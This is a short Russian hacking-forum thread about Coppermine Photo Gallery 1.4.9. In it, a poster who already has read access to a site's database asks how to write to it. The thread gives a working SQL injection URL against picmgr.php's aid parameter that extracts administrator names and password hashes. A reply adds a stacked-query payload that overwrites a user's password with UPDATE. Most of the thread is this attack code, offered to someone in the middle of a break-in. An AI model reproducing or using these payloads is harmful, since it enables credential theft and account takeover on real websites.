Форум АНТИЧАТ - Coppermine Photo Gallery 1.4.9

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Coppermine Photo Gallery 1.4.9 (https://forum.antichat.xyz/showthread.php?t=45533)

Coppermine Photo Gallery 1.4.9

Пробился к базе могу селектить, вопрос можно ли выполнить INSERT или UPDATE

P.S. Да сам пробовал никак не получаеццо 8(
P.P.S Пользовалсо уязвимостью скрипта picmgr.php переменной aid

Код:

http://host/gallery/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--

зависит от того есть ли мэджик квоутс и есть ли права у юзера для апйдета-инзерта
а вообще вид запроса такой

Код:

select * from sometable 

where ='x';

      UPDATE user

      SET pass = '31337'

      WHERE email = 'admin@microsoft.ru';

то есть ./picmgr.php?aid=31337';UPDATE+user+SET+pass='31337' +WHERE+email='admin@microsoft.ru';